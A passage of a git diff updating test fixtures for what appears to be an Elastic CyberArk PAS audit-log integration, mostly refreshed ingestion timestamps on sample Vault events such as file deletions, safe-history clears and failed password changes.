Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:10:17\",\"IsoTimestamp\":\"2021-03-14T12:10:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "52", "kind": "event" 
@@ -643,7 +632,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820763400Z", + "ingested": "2021-12-09T13:37:06.873574800Z", "original": "\u003c5\u003e1 2021-03-15T15:09:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:09:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:09:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-10.128.0.7-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.7\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:09:00\",\"IsoTimestamp\":\"2021-03-15T15:09:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-Oracle-10.128.0.7-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.7\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "52", "kind": "event" 
@@ -721,7 +710,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820764900Z", + "ingested": "2021-12-09T13:37:06.873578900Z", "original": "\u003c5\u003e1 2021-03-15T15:13:59Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:13:59\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:13:59Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.128.0.7-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.7\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:13:59\",\"IsoTimestamp\":\"2021-03-15T15:13:59Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.128.0.7-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.7\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "52", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json index 22d48be208d..86bc4413574 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-57-cpm-change-password-failed.log-expected.json 
@@ -92,7 +92,7 @@ "event": { "severity": 7, "reason": "Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002", - "ingested": "2021-06-09T10:24:36.068992600Z", + "ingested": "2021-12-09T13:37:07.987594400Z", "original": "\u003c7\u003e1 2021-03-25T12:00:08Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 08:00:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T12:00:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e57\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux Accounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-rhel7.cybr.com-firecall2\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 
Error code:9002\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=rhel7.cybr.com;username=firecall2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"firecall2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"rhel7.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Name\\\" Value=\\\"Operating System-UnixSSH-rhel7.cybr.com-root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Folder\\\" Value=\\\"Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Safe\\\" Value=\\\"Linux Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1616673608\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580255\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 
Error code:9002\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011989\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1576120341\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"No\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 08:00:08\",\"IsoTimestamp\":\"2021-03-25T12:00:08Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"57\",\"Desc\":\"CPM Change Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux Accounts\",\"File\":\"Root\\\\Operating System-UnixSSH-rhel7.cybr.com-firecall2\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. 
Error code:9002\",\"ExtraDetails\":\"address=rhel7.cybr.com;username=firecall2;\",\"Message\":\"CPM Change Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"firecall2\"},{\"Name\":\"Address\",\"Value\":\"rhel7.cybr.com\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"ExtraPass3Name\",\"Value\":\"Operating System-UnixSSH-rhel7.cybr.com-root\"},{\"Name\":\"ExtraPass3Folder\",\"Value\":\"Root\"},{\"Name\":\"ExtraPass3Safe\",\"Value\":\"Linux Root\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1616673608\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580255\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Execution error. EXT01::A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. Error code:9002\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011989\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1576120341\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"No\"},{\"Name\":\"Tags\",\"Value\":\"SSH\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "57", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json index 277f0341138..b67bb987722 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-59-clear-safe-history.log-expected.json 
@@ -48,7 +48,7 @@ "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-06-09T10:24:36.123418600Z", + "ingested": "2021-12-09T13:37:08.157345200Z", "original": "\u003c5\u003e1 2021-03-04T19:25:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:25:02\",\"IsoTimestamp\":\"2021-03-04T19:25:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" @@ -92,7 +92,7 @@ "event": { "severity": 2, "action": "clear safe history", - "ingested": "2021-06-09T10:24:36.123427700Z", + "ingested": "2021-12-09T13:37:08.157354300Z", "original": "Mar 08 03:10:31 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}", "code": "59", "kind": "event" 
@@ -149,7 +149,7 @@
 "event": {
 "severity": 2,
 "action": "clear safe history",
- "ingested": "2021-06-09T10:24:36.123429600Z",
+ "ingested": "2021-12-09T13:37:08.157360200Z",
 "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"59\",\"Desc\":\"Clear Safe History\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Clear Safe History\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"System\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Clear Safe History\",\"GatewayStation\":\"\"}}}",
 "code": "59",
 "kind": "event"
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log
index 2a5483207bf..f526f3989a1 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-60-cpm-reconcile-password-failed.log
@@ -1,9 +1,9 @@ -<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 
60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). 
